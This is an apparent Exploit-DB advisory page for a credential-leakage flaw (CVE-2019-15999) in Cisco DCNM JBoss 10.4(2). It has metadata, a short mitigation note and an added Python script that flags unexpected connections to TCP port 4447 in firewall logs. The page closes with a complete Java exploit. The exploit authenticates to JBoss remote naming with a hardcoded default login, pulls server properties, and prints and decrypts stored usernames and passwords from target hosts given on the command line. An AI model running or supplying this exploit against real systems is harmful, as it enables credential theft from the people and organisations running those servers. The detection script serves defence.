Vendor: DCNM
By: Harrison Neal
CVSS: 6.3 (MEDIUM)
Credential Leakage
CWE: 287
Product Name: DCNM
Affected Version From: 10.4(2)
Affected Version To: 10.4(2)
Patch Exists: YES
Related CVE: CVE-2019-15999
CPE: a:cisco:dcnm:10.4:2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2020

Cisco DCNM JBoss 10.4 – Credential Leakage

This exploit allows an attacker to gain access to credentials stored in Cisco DCNM JBoss 10.4. The code below connects to the JBoss remote naming service on port 4447, looks up the DbAdminWS interface, reads the server properties, and prints every non-empty property whose name contains "user" or "pass", decrypting the password values. Compiling and running it requires a few .jars from a copy of Cisco DCNM. To compile, the file path must match ${package}/${class}.java, e.g., com/whatdidibreak/dcnm_expl/Main.java. The packaged jar is then run as java -jar PackagedJarFile Victim1IpOrFqdn [victim2 ...], taking one or more target addresses.

Mitigation:

The user should ensure that the system is updated with the latest security patches and should use strong passwords to protect the system.
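
A detection check to go with the mitigation, added here as an example and not part of the original advisory or the exploit author's code: the proof-of-concept on this page reaches JBoss remote naming on TCP port 4447, so the Python below scans firewall logs for connections to that port on DCNM servers from sources outside a management allowlist. The server address, the allowlisted subnet and the iptables-style sample lines are constructed assumptions.

```python
import ipaddress
import re

# Assumptions (not from the page): the DCNM server addresses and the management
# subnet that is allowed to reach JBoss remoting. Adjust to your environment.
DCNM_SERVERS = {ipaddress.ip_address("192.0.2.10")}
ALLOWED_SOURCES = [ipaddress.ip_network("198.51.100.0/28")]
JBOSS_REMOTING_PORT = 4447  # port used in the PoC's PROVIDER_URL

FIELD_RE = re.compile(r"\b(SRC|DST|PROTO|DPT)=(\S+)")

# Constructed sample lines in iptables LOG format.
SAMPLE_LOG = """\
Jan  6 10:00:01 fw kernel: IN=eth0 OUT=eth1 SRC=198.51.100.5 DST=192.0.2.10 LEN=60 TTL=63 PROTO=TCP SPT=40112 DPT=4447 SYN
Jan  6 10:02:17 fw kernel: IN=eth0 OUT=eth1 SRC=203.0.113.77 DST=192.0.2.10 LEN=60 TTL=52 PROTO=TCP SPT=51834 DPT=4447 SYN
Jan  6 10:02:40 fw kernel: IN=eth0 OUT=eth1 SRC=203.0.113.77 DST=192.0.2.10 LEN=60 TTL=52 PROTO=TCP SPT=51990 DPT=443 SYN
Jan  6 10:03:05 fw kernel: IN=eth0 OUT=eth1 SRC=203.0.113.77 DST=192.0.2.99 LEN=60 TTL=52 PROTO=TCP SPT=52001 DPT=4447 SYN
Jan  6 10:04:11 fw kernel: truncated entry SRC=bad DST=192.0.2.10 PROTO=TCP DPT=4447
"""

def parse_line(line):
    """Return (src, dst, proto, dport), or None if the line is unusable."""
    fields = dict(FIELD_RE.findall(line))
    try:
        return (ipaddress.ip_address(fields["SRC"]),
                ipaddress.ip_address(fields["DST"]),
                fields["PROTO"], int(fields["DPT"]))
    except (KeyError, ValueError):
        return None  # missing field or malformed address/port

def find_unexpected_remoting_clients(log_text):
    """Map each non-allowlisted source IP to its hit count on tcp/4447."""
    hits = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, dst, proto, dport = parsed
        if proto != "TCP" or dport != JBOSS_REMOTING_PORT or dst not in DCNM_SERVERS:
            continue
        if any(src in net for net in ALLOWED_SOURCES):
            continue  # expected management traffic
        hits[str(src)] = hits.get(str(src), 0) + 1
    return hits

if __name__ == "__main__":
    for src, count in find_unexpected_remoting_clients(SAMPLE_LOG).items():
        print(f"ALERT {src} -> tcp/{JBOSS_REMOTING_PORT} x{count}")
```
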

Exploit-DB raw data:

# Exploit Title: Cisco DCNM JBoss 10.4 - Credential Leakage
# Date: 2020-01-06
# Exploit Author: Harrison Neal
# Vendor Homepage: https://www.cisco.com/
# Software Link: https://software.cisco.com/download/home/281722751/type/282088134/release/10.4(2)
# Version: 10.4(2)
# CVE: CVE-2019-15999

# You'll need a few .jars from a copy of Cisco DCNM to compile and run this code
# To compile, file path should match ${package}/${class}.java, e.g.,
# com/whatdidibreak/dcnm_expl/Main.java

# Usage: java -jar PackagedJarFile Victim1IpOrFqdn [victim2 ...]

package com.whatdidibreak.dcnm_expl;

import com.cisco.dcbu.jaxws.san.ep.DbAdminSEI;
import com.cisco.dcbu.jaxws.wo.DBRowDO;
import com.cisco.dcbu.lib.util.jboss_4_2.JBoss_4_2Encrypter;

import java.util.Properties;

import javax.naming.Context;
import javax.naming.InitialContext;

public class Main {

    public static void main(String[] args) throws Throwable {
        for (String target : args) {
            System.out.println("Target: " + target);

            Properties jndiProps = new Properties();
            jndiProps.put(Context.INITIAL_CONTEXT_FACTORY, "org.jboss.naming.remote.client.InitialContextFactory");
            jndiProps.put(Context.PROVIDER_URL, "remote://" + target + ":4447");
            jndiProps.put(Context.SECURITY_PRINCIPAL, "admin");
            jndiProps.put(Context.SECURITY_CREDENTIALS, "nbv_12345");
            jndiProps.put("jboss.naming.client.ejb.context", true);

            Context ctx = new InitialContext(jndiProps);

            DbAdminSEI i = (DbAdminSEI) ctx.lookup("dcm/jaxws-dbadmin/DbAdminWS!com.cisco.dcbu.jaxws.san.ep.DbAdminSEI");

            for (DBRowDO row : i.getServerProperties(null).getRows()) {
                String propName = row.getEntry()[0];
                String propValue = row.getEntry()[1];

                if (propValue.isEmpty()) {
                    continue;
                }

                if (propName.contains("user")) {
                    System.out.println(propName + " = " + propValue);
                } else if (propName.contains("pass")) {
                    System.out.println(propName + " = " + propValue + " (" + JBoss_4_2Encrypter.decrypt(propValue) + ")");
                }
            }

            System.out.println();
        }
    }
}